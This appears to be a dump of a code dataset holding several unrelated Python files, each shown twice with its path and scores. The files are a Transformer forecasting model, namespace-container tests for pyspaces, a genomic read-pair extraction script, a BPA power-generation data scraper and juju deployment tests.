self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
|
models/seq2seq/Transformer.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
| 0.928854 | 0.310139 |
import os
import pytest
import subprocess as s
from pyspaces import Container, Chroot, Inject, setns
def execute(argv):
"""Execute programm with arguments.
Args:
*args (list): arguments
"""
os.execvp(argv[0], argv)
def test_basic_container(capfd):
"""Check basic namespace.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1',
newpid=True, newuser=True, newns=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_all_ns_container(capfd):
"""Check all namespaces.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_not_all_ns_container(capfd):
"""Check all namespaces without network ns.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax; sleep 0.1"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True, net=False
)
c.start()
out, err = capfd.readouterr()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_basic_chroot(capfd):
"""Check basic chroot"""
c = Chroot(target=execute, args=(('/bin/ls', '/home/'),),
uid_map=True, newpid=True,
path=os.path.expanduser('~/.local/share/lxc/ubuntu/rootfs/')
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out == 'ubuntu\n'
def test_all_inject(capfd):
"""Check all ns inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 0.1'),),
uid_map='1000', all=True
)
c.start()
i = Inject(target=execute, args=(('bash', '-c', 'id'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
def test_not_all_inject(capfd):
"""Check inject without network ns"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True, net=False
)
c.start()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_all_setns(capfd):
"""Check basic inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True
)
c.start()
with setns(c.pid, all=True):
outt = s.check_output("id", shell=True)
out, err = capfd.readouterr()
print(out, err)
print(outt)
c.join()
assert outt.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
if __name__ == '__main__':
pytest.main()
|
tests/test_create_container.py
|
import os
import pytest
import subprocess as s
from pyspaces import Container, Chroot, Inject, setns
def execute(argv):
"""Execute programm with arguments.
Args:
*args (list): arguments
"""
os.execvp(argv[0], argv)
def test_basic_container(capfd):
"""Check basic namespace.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1',
newpid=True, newuser=True, newns=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_all_ns_container(capfd):
"""Check all namespaces.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_not_all_ns_container(capfd):
"""Check all namespaces without network ns.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax; sleep 0.1"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True, net=False
)
c.start()
out, err = capfd.readouterr()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_basic_chroot(capfd):
"""Check basic chroot"""
c = Chroot(target=execute, args=(('/bin/ls', '/home/'),),
uid_map=True, newpid=True,
path=os.path.expanduser('~/.local/share/lxc/ubuntu/rootfs/')
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out == 'ubuntu\n'
def test_all_inject(capfd):
"""Check all ns inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 0.1'),),
uid_map='1000', all=True
)
c.start()
i = Inject(target=execute, args=(('bash', '-c', 'id'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
def test_not_all_inject(capfd):
"""Check inject without network ns"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True, net=False
)
c.start()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_all_setns(capfd):
"""Check basic inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True
)
c.start()
with setns(c.pid, all=True):
outt = s.check_output("id", shell=True)
out, err = capfd.readouterr()
print(out, err)
print(outt)
c.join()
assert outt.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
if __name__ == '__main__':
pytest.main()
| 0.417509 | 0.474449 |
import argparse
import logging
import multiprocessing
import time
from functools import partial, update_wrapper
from defaults import EXTRACTION_MAX_READ_PAIRS, EXTRACTION_MAX_NM, EXTRACTION_MAX_INTERVAL_TRUNCATION, EXTRACTION_TRUNCATION_PAD
import pysam
compl_table = [chr(i) for i in xrange(256)]
compl_table[ord('A')] = 'T'
compl_table[ord('C')] = 'G'
compl_table[ord('G')] = 'C'
compl_table[ord('T')] = 'A'
def compl(seq):
return "".join([compl_table[ord(i)] for i in seq])
def get_sequence_quality(aln):
if not aln.is_reverse:
return aln.seq.upper(), aln.qual
return compl(aln.seq.upper())[::-1], aln.qual[::-1]
def write_read(fd, aln):
end_id = 1 if aln.is_read1 else 2
sequence, quality = get_sequence_quality(aln)
fd.write("@%s/%d\n%s\n+\n%s\n" % (aln.qname, end_id, sequence, quality))
def is_hq(aln, chr_tid, chr_start, chr_end):
return aln.is_unmapped or aln.mapq>0 or (not (aln.tid==chr_tid and chr_start<=aln.pos<=chr_end))
def all_pair(aln, mate, chr_tid, chr_start, chr_end):
return True
def all_pair_hq(aln, mate, chr_tid, chr_start, chr_end):
return is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def get_nm(aln):
nm_str = aln.opt("NM")
return int(nm_str) if nm_str else 0
def perfect_aln(aln):
return not aln.is_unmapped and aln.is_proper_pair and len(aln.cigar) == 1 and get_nm(aln) <= EXTRACTION_MAX_NM
def non_perfect(aln, mate, chr_tid, chr_start, chr_end):
return not (perfect_aln(aln) and perfect_aln(mate))
def non_perfect_hq(aln, mate, chr_tid, chr_start, chr_end):
return (not (perfect_aln(aln) and perfect_aln(mate))) and is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def discordant(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
return not (isize_min <= abs(aln.tlen) <= isize_max)
def discordant_with_normal_orientation(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
if aln.is_reverse and mate.is_reverse or not aln.is_reverse and not mate.is_reverse: return False
return not (isize_min <= abs(aln.tlen) <= isize_max)
def get_mate(aln, bam_handles):
mate = None
for bam_handle in bam_handles:
try:
mate = bam_handle.mate(aln)
except ValueError:
pass
if mate is not None:
return mate
return mate
def extract_read_pairs(bam_handles, region, prefix, extract_fns, pad=0, max_read_pairs = EXTRACTION_MAX_READ_PAIRS,
truncation_pad_read_extract = EXTRACTION_TRUNCATION_PAD,
max_interval_len_truncation = EXTRACTION_MAX_INTERVAL_TRUNCATION, sv_type=''):
logger = logging.getLogger("%s-%s" % (extract_read_pairs.__name__, multiprocessing.current_process()))
extract_fn_names = [extract_fn.__name__ for extract_fn in extract_fns]
logger.info("Extracting reads for region %s with padding %d using functions %s" % (
region, pad, extract_fn_names))
chr_name = str(region.split(':')[0])
chr_start = int(region.split(':')[1].split("-")[0]) - pad
chr_end = int(region.split(':')[1].split('-')[1]) + pad
selected_pair_counts = [0] * len(extract_fn_names)
start_time = time.time()
if chr_start < 0:
regions_to_extract = []
logger.error("Skipping read extraction since interval too close to chromosome beginning")
else:
# Read alignments from the interval in memory and build a dictionary to get mate instead of calling bammate.mate() function
regions_to_extract = [(chr_name, chr_start, chr_end)]
if abs(chr_end-chr_start)>max_interval_len_truncation and sv_type in ["INV","DEL","DUP"]:
# For large SVs, middle sequences has no effect on genotyping. So, we only extract reads around breakpoints to speed up
truncate_start = chr_start + pad + truncation_pad_read_extract
truncate_end = chr_end - (pad + truncation_pad_read_extract)
logger.info("Truncate the reads in [%d-%d] for %s_%d_%d" % (truncate_start,truncate_end,chr_name,chr_start,chr_end))
regions_to_extract = [(chr_name, chr_start, truncate_start-1), (chr_name, truncate_end+1, chr_end)]
aln_list = [aln for (chr_, start_, end_) in regions_to_extract for bam_handle in bam_handles for aln in bam_handle.fetch(chr_, start=start_, end=end_) if not aln.is_secondary]
aln_dict = {}
for aln in aln_list:
if aln.qname not in aln_dict:
aln_dict[aln.qname] = [None, None]
aln_dict[aln.qname][0 if aln.is_read1 else 1] = aln
aln_pairs = []
if len(aln_dict) <= max_read_pairs:
logger.info("Building mate dictionary from %d reads" % len(aln_list))
for aln_pair in aln_dict.values():
missing_index = 0 if aln_pair[0] is None else (1 if aln_pair[1] is None else 2)
if missing_index < 2:
mate = get_mate(aln_pair[1 - missing_index], bam_handles)
if mate is not None:
aln_pair[missing_index] = mate
aln_pairs.append(aln_pair)
else:
aln_pairs.append(aln_pair)
else:
logger.info("Too many reads encountered for %s. Skipping read extraction. (%d >%d)"%(region, len(aln_dict),max_read_pairs))
ends = [(open("%s_%s_1.fq" % (prefix, name), "w"), open("%s_%s_2.fq" % (prefix, name), "w")) for name in
extract_fn_names]
chr_tid = bam_handles[0].gettid(chr_name) if bam_handles else -1
for first, second in aln_pairs:
for fn_index, extract_fn in enumerate(extract_fns):
if extract_fn(first, second,chr_tid,chr_start,chr_end):
write_read(ends[fn_index][0], first)
write_read(ends[fn_index][1], second)
selected_pair_counts[fn_index] += 1
for end1, end2 in ends:
end1.close()
end2.close()
logger.info("Examined %d pairs in %g seconds" % (len(aln_pairs), time.time() - start_time))
logger.info("Extraction counts %s" % (zip(extract_fn_names, selected_pair_counts)))
return zip([(end[0].name, end[1].name) for end in ends], selected_pair_counts)
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
parser = argparse.ArgumentParser(description="Extract reads and mates from a region for spades assembly",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bams", nargs='+', help="BAM files to extract reads from", required=True, default=[])
parser.add_argument("--region", help="Samtools region string", required=True)
parser.add_argument("--prefix", help="Output FASTQ prefix", required=True)
parser.add_argument("--extract_fn", help="Extraction function", choices=["all_pair", "non_perfect", "discordant"],
default="all_pair")
parser.add_argument("--pad", help="Padding to apply on both sides of the interval", type=int, default=0)
parser.add_argument("--isize_min", help="Minimum insert size", default=200, type=int)
parser.add_argument("--isize_max", help="Maximum insert size", default=500, type=int)
parser.add_argument("--max_read_pairs", help="Maximum read pairs to extract for an interval",
default=EXTRACTION_MAX_READ_PAIRS, type=int)
args = parser.parse_args()
if args.extract_fn == 'all_pair':
extract_fn = all_pair
elif args.extract_fn == 'non_perfect':
extract_fn = non_perfect
else:
extract_fn = partial(discordant, isize_min=args.isize_min, isize_max=args.isize_max)
update_wrapper(extract_fn, discordant)
bam_handles = [pysam.Samfile(bam, "rb") for bam in args.bams]
extract_read_pairs(bam_handles, args.region, args.prefix, [extract_fn], pad=args.pad,
max_read_pairs=args.max_read_pairs)
for bam_handle in bam_handles:
bam_handle.close()
|
metasv/extract_pairs.py
|
import argparse
import logging
import multiprocessing
import time
from functools import partial, update_wrapper
from defaults import EXTRACTION_MAX_READ_PAIRS, EXTRACTION_MAX_NM, EXTRACTION_MAX_INTERVAL_TRUNCATION, EXTRACTION_TRUNCATION_PAD
import pysam
compl_table = [chr(i) for i in xrange(256)]
compl_table[ord('A')] = 'T'
compl_table[ord('C')] = 'G'
compl_table[ord('G')] = 'C'
compl_table[ord('T')] = 'A'
def compl(seq):
return "".join([compl_table[ord(i)] for i in seq])
def get_sequence_quality(aln):
if not aln.is_reverse:
return aln.seq.upper(), aln.qual
return compl(aln.seq.upper())[::-1], aln.qual[::-1]
def write_read(fd, aln):
end_id = 1 if aln.is_read1 else 2
sequence, quality = get_sequence_quality(aln)
fd.write("@%s/%d\n%s\n+\n%s\n" % (aln.qname, end_id, sequence, quality))
def is_hq(aln, chr_tid, chr_start, chr_end):
return aln.is_unmapped or aln.mapq>0 or (not (aln.tid==chr_tid and chr_start<=aln.pos<=chr_end))
def all_pair(aln, mate, chr_tid, chr_start, chr_end):
return True
def all_pair_hq(aln, mate, chr_tid, chr_start, chr_end):
return is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def get_nm(aln):
nm_str = aln.opt("NM")
return int(nm_str) if nm_str else 0
def perfect_aln(aln):
return not aln.is_unmapped and aln.is_proper_pair and len(aln.cigar) == 1 and get_nm(aln) <= EXTRACTION_MAX_NM
def non_perfect(aln, mate, chr_tid, chr_start, chr_end):
return not (perfect_aln(aln) and perfect_aln(mate))
def non_perfect_hq(aln, mate, chr_tid, chr_start, chr_end):
return (not (perfect_aln(aln) and perfect_aln(mate))) and is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def discordant(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
return not (isize_min <= abs(aln.tlen) <= isize_max)
def discordant_with_normal_orientation(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
if aln.is_reverse and mate.is_reverse or not aln.is_reverse and not mate.is_reverse: return False
return not (isize_min <= abs(aln.tlen) <= isize_max)
def get_mate(aln, bam_handles):
mate = None
for bam_handle in bam_handles:
try:
mate = bam_handle.mate(aln)
except ValueError:
pass
if mate is not None:
return mate
return mate
def extract_read_pairs(bam_handles, region, prefix, extract_fns, pad=0, max_read_pairs = EXTRACTION_MAX_READ_PAIRS,
truncation_pad_read_extract = EXTRACTION_TRUNCATION_PAD,
max_interval_len_truncation = EXTRACTION_MAX_INTERVAL_TRUNCATION, sv_type=''):
logger = logging.getLogger("%s-%s" % (extract_read_pairs.__name__, multiprocessing.current_process()))
extract_fn_names = [extract_fn.__name__ for extract_fn in extract_fns]
logger.info("Extracting reads for region %s with padding %d using functions %s" % (
region, pad, extract_fn_names))
chr_name = str(region.split(':')[0])
chr_start = int(region.split(':')[1].split("-")[0]) - pad
chr_end = int(region.split(':')[1].split('-')[1]) + pad
selected_pair_counts = [0] * len(extract_fn_names)
start_time = time.time()
if chr_start < 0:
regions_to_extract = []
logger.error("Skipping read extraction since interval too close to chromosome beginning")
else:
# Read alignments from the interval in memory and build a dictionary to get mate instead of calling bammate.mate() function
regions_to_extract = [(chr_name, chr_start, chr_end)]
if abs(chr_end-chr_start)>max_interval_len_truncation and sv_type in ["INV","DEL","DUP"]:
# For large SVs, middle sequences has no effect on genotyping. So, we only extract reads around breakpoints to speed up
truncate_start = chr_start + pad + truncation_pad_read_extract
truncate_end = chr_end - (pad + truncation_pad_read_extract)
logger.info("Truncate the reads in [%d-%d] for %s_%d_%d" % (truncate_start,truncate_end,chr_name,chr_start,chr_end))
regions_to_extract = [(chr_name, chr_start, truncate_start-1), (chr_name, truncate_end+1, chr_end)]
aln_list = [aln for (chr_, start_, end_) in regions_to_extract for bam_handle in bam_handles for aln in bam_handle.fetch(chr_, start=start_, end=end_) if not aln.is_secondary]
aln_dict = {}
for aln in aln_list:
if aln.qname not in aln_dict:
aln_dict[aln.qname] = [None, None]
aln_dict[aln.qname][0 if aln.is_read1 else 1] = aln
aln_pairs = []
if len(aln_dict) <= max_read_pairs:
logger.info("Building mate dictionary from %d reads" % len(aln_list))
for aln_pair in aln_dict.values():
missing_index = 0 if aln_pair[0] is None else (1 if aln_pair[1] is None else 2)
if missing_index < 2:
mate = get_mate(aln_pair[1 - missing_index], bam_handles)
if mate is not None:
aln_pair[missing_index] = mate
aln_pairs.append(aln_pair)
else:
aln_pairs.append(aln_pair)
else:
logger.info("Too many reads encountered for %s. Skipping read extraction. (%d >%d)"%(region, len(aln_dict),max_read_pairs))
ends = [(open("%s_%s_1.fq" % (prefix, name), "w"), open("%s_%s_2.fq" % (prefix, name), "w")) for name in
extract_fn_names]
chr_tid = bam_handles[0].gettid(chr_name) if bam_handles else -1
for first, second in aln_pairs:
for fn_index, extract_fn in enumerate(extract_fns):
if extract_fn(first, second,chr_tid,chr_start,chr_end):
write_read(ends[fn_index][0], first)
write_read(ends[fn_index][1], second)
selected_pair_counts[fn_index] += 1
for end1, end2 in ends:
end1.close()
end2.close()
logger.info("Examined %d pairs in %g seconds" % (len(aln_pairs), time.time() - start_time))
logger.info("Extraction counts %s" % (zip(extract_fn_names, selected_pair_counts)))
return zip([(end[0].name, end[1].name) for end in ends], selected_pair_counts)
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
parser = argparse.ArgumentParser(description="Extract reads and mates from a region for spades assembly",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bams", nargs='+', help="BAM files to extract reads from", required=True, default=[])
parser.add_argument("--region", help="Samtools region string", required=True)
parser.add_argument("--prefix", help="Output FASTQ prefix", required=True)
parser.add_argument("--extract_fn", help="Extraction function", choices=["all_pair", "non_perfect", "discordant"],
default="all_pair")
parser.add_argument("--pad", help="Padding to apply on both sides of the interval", type=int, default=0)
parser.add_argument("--isize_min", help="Minimum insert size", default=200, type=int)
parser.add_argument("--isize_max", help="Maximum insert size", default=500, type=int)
parser.add_argument("--max_read_pairs", help="Maximum read pairs to extract for an interval",
default=EXTRACTION_MAX_READ_PAIRS, type=int)
args = parser.parse_args()
if args.extract_fn == 'all_pair':
extract_fn = all_pair
elif args.extract_fn == 'non_perfect':
extract_fn = non_perfect
else:
extract_fn = partial(discordant, isize_min=args.isize_min, isize_max=args.isize_max)
update_wrapper(extract_fn, discordant)
bam_handles = [pysam.Samfile(bam, "rb") for bam in args.bams]
extract_read_pairs(bam_handles, args.region, args.prefix, [extract_fn], pad=args.pad,
max_read_pairs=args.max_read_pairs)
for bam_handle in bam_handles:
bam_handle.close()
| 0.218503 | 0.154185 |
sMAP feed for BPA Total Wind, Hydro, and Thermal Generation.
@author <NAME>
'''
import urllib2
import logging
from smap.driver import SmapDriver
from smap.util import periodicSequentialCall
from smap.contrib import dtutil
class BPADriver(SmapDriver):
'''
Scrape feed from BPA site and parse as a sMAP feed. BPA updates approximately every 5 minutes so we
update every 2.5 minutes to make sure we catch all the updates (updates are correctly timestamped
in increments of 5 minutes). We parse wind, hydro and thermal feeds.
'''
def setup(self, opts):
self.w = self.add_timeseries('/wind','MW',description='Total Wind Generation')
self.h = self.add_timeseries('/hydro','MW',description='Total Hydro Generation')
self.t = self.add_timeseries('/thermal','MW',description='Total Thermal Generation')
self.l = self.add_timeseries('/load','MW',description='Total Load')
self.set_metadata = {
'Location' : {'State': 'WA', 'Uri': 'http://transmission.bpa.gov/business/operations/wind/baltwg.txt'}
}
self.previousTime = 0
def start(self):
periodicSequentialCall(self.read).start(5*30) # updates every 2.5 minutes
def read(self):
object_ = {}
print('read running')
try:
#get the text from the ur
wa = urllib2.urlopen('http://transmission.bpa.gov/business/operations/wind/baltwg.txt')
data = [line for line in wa.readlines()[7:] if len(line.split()) > 3]
#parse most recent data
rawTime = " ".join(data[-1].split()[:2])
currentTime = int(dtutil.dt2ts(dtutil.strptime_tz(rawTime,"%m/%d/%Y %H:%M",'US/Pacific')))
object_["Wind"] = data[-1].split()[3]
object_["Hydro"] = data[-1].split()[4]
object_["Thermal"] = data[-1].split()[5]
object_["Load"] = data[-1].split()[2]
except Exception as e:
logging.exception(type(e))
print(e)
else:
if currentTime != self.previousTime:
self.w.add(currentTime,int(object_["Wind"]))
self.h.add(currentTime,int(object_["Hydro"]))
self.t.add(currentTime,int(object_["Thermal"]))
self.l.add(currentTime,int(object_["Load"]))
self.previousTime = currentTime
wa.close()
|
python/smap/drivers/washingtonbpa.py
|
sMAP feed for BPA Total Wind, Hydro, and Thermal Generation.
@author <NAME>
'''
import urllib2
import logging
from smap.driver import SmapDriver
from smap.util import periodicSequentialCall
from smap.contrib import dtutil
class BPADriver(SmapDriver):
'''
Scrape feed from BPA site and parse as a sMAP feed. BPA updates approximately every 5 minutes so we
update every 2.5 minutes to make sure we catch all the updates (updates are correctly timestamped
in increments of 5 minutes). We parse wind, hydro and thermal feeds.
'''
def setup(self, opts):
self.w = self.add_timeseries('/wind','MW',description='Total Wind Generation')
self.h = self.add_timeseries('/hydro','MW',description='Total Hydro Generation')
self.t = self.add_timeseries('/thermal','MW',description='Total Thermal Generation')
self.l = self.add_timeseries('/load','MW',description='Total Load')
self.set_metadata = {
'Location' : {'State': 'WA', 'Uri': 'http://transmission.bpa.gov/business/operations/wind/baltwg.txt'}
}
self.previousTime = 0
def start(self):
periodicSequentialCall(self.read).start(5*30) # updates every 2.5 minutes
def read(self):
object_ = {}
print('read running')
try:
#get the text from the ur
wa = urllib2.urlopen('http://transmission.bpa.gov/business/operations/wind/baltwg.txt')
data = [line for line in wa.readlines()[7:] if len(line.split()) > 3]
#parse most recent data
rawTime = " ".join(data[-1].split()[:2])
currentTime = int(dtutil.dt2ts(dtutil.strptime_tz(rawTime,"%m/%d/%Y %H:%M",'US/Pacific')))
object_["Wind"] = data[-1].split()[3]
object_["Hydro"] = data[-1].split()[4]
object_["Thermal"] = data[-1].split()[5]
object_["Load"] = data[-1].split()[2]
except Exception as e:
logging.exception(type(e))
print(e)
else:
if currentTime != self.previousTime:
self.w.add(currentTime,int(object_["Wind"]))
self.h.add(currentTime,int(object_["Hydro"]))
self.t.add(currentTime,int(object_["Thermal"]))
self.l.add(currentTime,int(object_["Load"]))
self.previousTime = currentTime
wa.close()
| 0.437103 | 0.362518 |
from pathlib import Path
import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# Restore config back to default
await ubuntu_app.reset_config(['tuning-level'])
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'safest'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
# check action definitions
actions = await ubuntu_app.get_actions()
assert 'backup' in actions.keys()
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_set_config(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
config = await ubuntu_app.get_config()
await ubuntu_app.set_config(config)
config2 = await ubuntu_app.get_config()
assert config == config2
@base.bootstrapped
@pytest.mark.asyncio
async def test_status_is_not_unset(event_loop):
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
assert app.status != 'unset'
@base.bootstrapped
@pytest.mark.asyncio
async def test_status(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/blocked-0')
def app_ready():
if not app.units:
return False
return app.status == 'blocked'
await model.block_until(app_ready, timeout=480)
assert app.status == 'blocked'
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
